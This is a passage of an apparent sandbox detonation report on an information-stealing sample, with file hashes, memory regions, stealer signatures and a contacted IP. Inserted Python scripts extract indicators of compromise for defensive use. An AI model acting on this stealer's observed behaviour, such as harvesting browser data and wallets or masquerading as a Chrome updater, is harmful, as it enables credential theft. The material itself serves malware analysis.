SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2636-334-0x000000000A710000-0x000000000AD44000-memory.dmp

memory/2608-336-0x0000000077C90000-0x0000000077E39000-memory.dmp

memory/2600-337-0x0000000000A20000-0x0000000001054000-memory.dmp

memory/2600-338-0x0000000077E80000-0x0000000077E82000-memory.dmp

memory/2600-341-0x0000000000540000-0x00000000005B0000-memory.dmp

memory/2600-342-0x0000000074D90000-0x000000007547E000-memory.dmp

memory/2600-343-0x0000000002AD0000-0x0000000002B3C000-memory.dmp

memory/2600-345-0x0000000005350000-0x0000000005390000-memory.dmp

memory/2600-344-0x0000000005350000-0x0000000005390000-memory.dmp

memory/2600-346-0x0000000005350000-0x0000000005390000-memory.dmp

memory/2600-347-0x0000000005A20000-0x0000000005AD2000-memory.dmp

memory/2636-370-0x000000000A710000-0x000000000AD44000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1044-384-0x00000000199E0000-0x0000000019CC2000-memory.dmp

memory/1044-385-0x00000000009C0000-0x00000000009C8000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Local State

MD5 599ca5736af45693fb51e9c651732be7
SHA1 c5f5ca164674e1efeb338c4e0c871a8929e95daa
SHA256 d29a09b1c799fb997acd0fd8ed25e299bf098cb88359157a3e0a3ea6639d74f1
SHA512 297f14878c07c1571ebc55a4c4a350149541b4af68c910a10d8c74e6b44de7290dd84664b0bec08876321fed703e29a11aaf2b615a7e08a434bd52ed5f1bf2fa

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Local Storage\leveldb\LOG

MD5 ec57f79b5fcea2ce4a3b031888983ff6
SHA1 75898d7cf9bde6655e81d188dc627f223ba0799d
SHA256 569e212b0f9164c16c010cca98a95de990a945dfdda9aceebcd2cb44a8d930b7
SHA512 674f05bd59d1c2b665d27eb609dacf18877537816a54b7c2f6fe31cbbf216590ca7fbf45e330f705ace5be3d5d58023b90e042b386f4bfea4c3350b2f1ff1749

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Local Storage\leveldb\LOG.old

MD5 04426290c7712a5cbf253ab93ddaf201
SHA1 1d3ff9ef22c8481a14a89cee64c33fe2a3e49253
SHA256 59504130a3354ab475799627fed99337361bedf88ae2cb28f5e07bf5c698a649
SHA512 008fecf9035fa6355cd57330773179d477f7ce89a22f3df4b2966d0298a73370b8a3248b486d53e99d2c32b929b0a17388907362168f30a3a5dbe84ce1cacbb9

\??\pipe\crashpad_1724_NHRMAEQILULASOTW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Session Storage\CURRENT~RFf7858da.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\DevToolsActivePort

MD5 f8e33bdc39c6810f36e82932efff4ef6
SHA1 e2c309b78e7b75635c49faadd58a2ff2b8b5d2b1
SHA256 9b8c8b037447eb8db84a8c5a20d65e42048656c81d3b35a5ea3839f3a7df77cc
SHA512 199ac1320678f91dd1c14535c46cadaadc75a3d1b0dbc860ad90320d9434b1670ee24431d1fc2eddc25a4f333a6357a02aec4a6a4f9a361d14bc858de855a1be

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Session Storage\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Local Storage\leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Code Cache\wasm\index-dir\the-real-index

MD5 abe07b00cd501c8f6ad17b54c442f6b1
SHA1 a6ba802d35a239939bb2e98f5941b7f6cda6755b
SHA256 263c14a93da320c5ab6c469b0da71fcf99f8e496dde7988f0ec15931711c9177
SHA512 a329fae6f5a56a4b53f419bd531ab9ffc95cb60a1f6e7181c8b17c381cdbdb5fe893fdc6772559ea47b6af40a9d04d3b7ee11779f1f70dfc240dab6f6d5ba264

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Code Cache\js\index-dir\the-real-index

MD5 b42082fc8475069b066cd4be2b1a1eb9
SHA1 710543039e59200fb5c106f8a69b24025e4c8d36
SHA256 c2cc25c0b61ff004ef7ec5cf5419642f360abc9ac5a00e93ba115ab69c392a52
SHA512 e0726e4dc3d83b03baa8f2a11c0d69e3dc24031d13caeb7aae01328d4b74ac11f29b4b42c5b454a1df4554e9c262ca81106e6aaf0041e5231b252cccb23b6a81

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Code Cache\js\60ae0d0fe9088cac_0

MD5 4e06038c915cd74e6352bd1a3458d25d
SHA1 5d74b69cd00ce4b95c9b167cce49a2917306a832
SHA256 365c3d3a8c01c5cf58a91479de548af028228eb7a9f8fe27cfacf9d8b6ada57f
SHA512 784173a3620e2b11bc325368527909590a19e3a09caaa39de6f9814c7d333309356419ae11ab074b77137382db8a91458cd8c4ced70feef99218432ba9c37283

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Cache\Cache_Data\f_000002

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Crashpad\settings.dat

MD5 2c9706166e3737e14c39738b1c1b5306
SHA1 8d36f3009757c4ecbba6dd35d1c3d2b2881e42ad
SHA256 8f89f17722ba50a1509d2b84fc8402d70b4eae756fbb68243e8c66064b4541b0
SHA512 407be3e6e057f90263b495d754c8620418e9bd2a129af0e8fb3013808ff513d1c1a396940bc2f4d6c2b1264783d0de1e73b00ae3914d6ba39d9412dfe649e442
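Two things in the listing above are easier to establish mechanically than by eye. First, the digests recorded for C:\Windows\Temp\setup.exe (MD5 84741bc02d2e9226a943aa03b6a4568d, SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93) are the same ones recorded for C:\Program Files\Google\Chrome\updater.exe, so one binary was written to two locations, the second under a name that looks like a Chrome component. Second, the two named-pipe entries carry the well-known digests of zero-byte input (MD5 d41d8cd9..., SHA256 e3b0c442...), so they contribute no file-content indicator. The Python below is an added example, not tooling from the report or the sandbox: it parses an abridged excerpt of this Files section (the report's own paths, digests and memory dump names; SHA1/SHA512 and blank lines dropped for brevity), groups locations per SHA256 after stripping the drive letter, flags empty-content entries, and sizes the memory/ regions. Function names and the choice of excerpt are mine.

```python
import re
from collections import defaultdict

# Abridged excerpt of the Files listing above: the paths, digests and memory
# dump names are the report's own data (SHA1/SHA512 and blank lines dropped
# for brevity); the parser and the checks are added example code.
REPORT_EXCERPT = r"""\Windows\Temp\setup.exe
MD5 84741bc02d2e9226a943aa03b6a4568d
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
memory/2904-166-0x000000013F1C0000-0x00000001403E6000-memory.dmp
memory/1916-187-0x0000000000400000-0x0000000000527000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\cli.exe
MD5 b78141a544759e1a07740aa28b35584c
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
\??\PIPE\srvsvc
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
C:\Program Files\Google\Chrome\updater.exe
MD5 84741bc02d2e9226a943aa03b6a4568d
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]+)$")
MEM_RE = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
DRIVE_RE = re.compile(r"^[A-Za-z]:")
# SHA256 of zero bytes: what the named-pipe entries in the listing hash to.
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"


def normalise_path(path):
    """Drop the drive letter so '\\X' and 'C:\\X' count as one location."""
    return DRIVE_RE.sub("", path)


def parse_report(text):
    """Return (files, regions): path+digest dicts and (pid, seq, start, end)."""
    files, regions, current = [], [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            regions.append((int(pid), int(seq), int(start, 16), int(end, 16)))
            current = None
            continue
        m = HASH_RE.match(line)
        if m:
            if current is None:
                raise ValueError("digest without a preceding path: " + line)
            current[m.group(1)] = m.group(2)
            continue
        current = {"path": normalise_path(line)}   # any other line is a path
        files.append(current)
    return files, regions


def paths_by_sha256(files):
    groups = defaultdict(set)
    for f in files:
        if "SHA256" in f:
            groups[f["SHA256"]].add(f["path"])
    return groups


def multi_location_hashes(files):
    """Identical bytes written under more than one path: masquerade candidates."""
    return {h: sorted(p) for h, p in paths_by_sha256(files).items() if len(p) > 1}


def empty_content_entries(files):
    """Entries whose digest is that of empty input (pipes, zero-byte drops)."""
    return sorted(f["path"] for f in files if f.get("SHA256") == EMPTY_SHA256)


def region_sizes(regions):
    """Bytes spanned by each dumped region, keyed by PID then (start, end)."""
    sizes = defaultdict(dict)
    for pid, _seq, start, end in regions:
        sizes[pid][(start, end)] = end - start
    return sizes


if __name__ == "__main__":
    files, regions = parse_report(REPORT_EXCERPT)
    for digest, paths in multi_location_hashes(files).items():
        print(digest, "->", paths)
    print("no file content:", empty_content_entries(files))
    for pid, regs in region_sizes(regions).items():
        for (start, end), size in regs.items():
            print(f"pid {pid}: 0x{start:X}-0x{end:X} ({size:#x} bytes)")
```

Grouping on the normalised path is what turns the listing's repeated entries into a usable IOC set: the multi-location digest is the one to hunt for on disk, the empty-content entries are the ones to drop before the hash list goes into a blocklist, and the region sizes give a quick sanity check that a dump named for a PID actually covers an image-sized mapping rather than a single page.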

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-10 18:24

Reported

2023-08-10 18:26

Platform

win10v2004-20230703-en

Max time kernel

137s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of AdjustPrivilegeToken

Description              Indicator  Process                                                                  Target
Token: SeDebugPrivilege  N/A        C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe  N/A

Processes

C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe

"C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3460 -ip 3460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3460 -s 1416

Network

Country  Destination           Domain                         Proto
US       8.8.8.8:53            59.128.231.4.in-addr.arpa      udp
US       8.8.8.8:53            240.81.21.72.in-addr.arpa      udp
US       8.8.8.8:53            0.159.190.20.in-addr.arpa      udp
US       8.8.8.8:53            108.211.229.192.in-addr.arpa   udp
NL       136.244.98.226:33587  -                              tcp
US       8.8.8.8:53            226.98.244.136.in-addr.arpa    udp
US       8.8.8.8:53            158.240.127.40.in-addr.arpa    udp
US       8.8.8.8:53            26.165.165.52.in-addr.arpa     udp
US       8.8.8.8:53            18.31.95.13.in-addr.arpa       udp
US       8.8.8.8:53            254.135.241.8.in-addr.arpa     udp
US       8.8.8.8:53            2.77.109.52.in-addr.arpa       udp
US       8.8.8.8:53            11.173.189.20.in-addr.arpa     udp
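The table above mixes two kinds of traffic: eleven reverse-DNS (PTR) queries to 8.8.8.8 for addresses the host touched, and a single direct TCP connection, to 136.244.98.226:33587 in NL. Exactly one of the PTR names, 226.98.244.136.in-addr.arpa, decodes to that same peer. That intersection is the check worth automating when pulling network indicators out of a report like this: decode every in-addr.arpa name back to its address and intersect the result with the non-DNS destinations, so the one peer the sample actually talked to is separated from resolver noise. The Python below is an added example, not tooling from the report; it embeds the rows of this table (the report's own data), accepts either a blank or a "-" in the Domain column, and the function names are mine. The report does not say what 136.244.98.226 is, and the code makes no claim beyond the overlap.

```python
import ipaddress
import re

# Rows copied from the Network table above (the report's own data,
# whitespace-normalised); the parsing and the checks are added example code.
NETWORK_ROWS = """\
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 254.135.241.8.in-addr.arpa udp
US 8.8.8.8:53 2.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
"""

# Country, ip:port, optional domain, protocol. The domain cell is absent for
# direct connections; a "-" placeholder is also accepted.
ROW_RE = re.compile(
    r"^(?P<cc>[A-Z]{2}) (?P<ip>[0-9.]+):(?P<port>\d+)"
    r"(?: (?P<domain>\S+))? (?P<proto>tcp|udp)$")


def ptr_to_ip(name):
    """Decode d.c.b.a.in-addr.arpa back to the IPv4 address a.b.c.d."""
    name = name.lower().rstrip(".")
    if not name.endswith(".in-addr.arpa"):
        raise ValueError("not a reverse-lookup name: " + name)
    labels = name[: -len(".in-addr.arpa")].split(".")
    if len(labels) != 4:
        raise ValueError("not a full /32 reverse name: " + name)
    # IPv4Address validates each octet, so junk labels fail loudly here.
    return str(ipaddress.IPv4Address(".".join(reversed(labels))))


def parse_rows(text):
    rows = []
    for line in text.splitlines():
        line = " ".join(line.split())          # collapse column padding
        if not line or line.startswith("Country"):
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError("unparsed row: " + line)
        d = m.groupdict()
        if d["domain"] == "-":
            d["domain"] = None
        rows.append({"country": d["cc"], "ip": d["ip"], "port": int(d["port"]),
                     "domain": d["domain"], "proto": d["proto"]})
    return rows


def split_traffic(rows):
    """Reverse-lookup targets on one side, non-DNS connections on the other."""
    looked_up, direct = set(), set()
    for r in rows:
        is_dns = r["port"] == 53 and r["domain"] is not None
        if is_dns and r["domain"].endswith(".in-addr.arpa"):
            looked_up.add(ptr_to_ip(r["domain"]))
        elif not is_dns:
            direct.add((r["ip"], r["port"], r["proto"]))
    return looked_up, direct


def reverse_resolved_peers(rows):
    """Direct-connection peers whose address was also reverse-resolved."""
    looked_up, direct = split_traffic(rows)
    return sorted({ip for ip, _, _ in direct if ip in looked_up})


if __name__ == "__main__":
    rows = parse_rows(NETWORK_ROWS)
    looked_up, direct = split_traffic(rows)
    print(f"{len(looked_up)} reverse lookups, {len(direct)} direct connections")
    print("peers that were both connected to and reverse-resolved:",
          reverse_resolved_peers(rows))
```

The reversal in ptr_to_ip is the part people get wrong by hand: the labels of an in-addr.arpa name are the octets in reverse order, so 226.98.244.136.in-addr.arpa is 136.244.98.226, not 226.98.244.136. Feeding the un-reversed form into a blocklist would block the wrong address.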

Files

memory/3460-134-0x0000000002530000-0x0000000002630000-memory.dmp

memory/3460-135-0x0000000003F10000-0x0000000003F4F000-memory.dmp

memory/3460-136-0x0000000000400000-0x00000000022FF000-memory.dmp

memory/3460-137-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-138-0x00000000751A0000-0x0000000075950000-memory.dmp

memory/3460-139-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-140-0x0000000006A60000-0x0000000007004000-memory.dmp

memory/3460-141-0x0000000007200000-0x0000000007818000-memory.dmp

memory/3460-142-0x0000000007820000-0x000000000792A000-memory.dmp

memory/3460-144-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-143-0x0000000007930000-0x0000000007942000-memory.dmp

memory/3460-145-0x0000000007950000-0x000000000798C000-memory.dmp

memory/3460-146-0x0000000002530000-0x0000000002630000-memory.dmp

memory/3460-147-0x0000000003F10000-0x0000000003F4F000-memory.dmp

memory/3460-148-0x0000000000400000-0x00000000022FF000-memory.dmp

memory/3460-150-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-151-0x00000000751A0000-0x0000000075950000-memory.dmp

memory/3460-152-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-153-0x0000000007C40000-0x0000000007CB6000-memory.dmp

memory/3460-154-0x0000000007CC0000-0x0000000007D52000-memory.dmp

memory/3460-155-0x0000000007D60000-0x0000000007DC6000-memory.dmp

memory/3460-156-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-157-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-158-0x0000000009680000-0x0000000009842000-memory.dmp

memory/3460-159-0x0000000009880000-0x0000000009DAC000-memory.dmp

memory/3460-160-0x00000000088B0000-0x0000000008900000-memory.dmp

memory/3460-162-0x0000000000400000-0x00000000022FF000-memory.dmp

memory/3460-163-0x00000000751A0000-0x0000000075950000-memory.dmp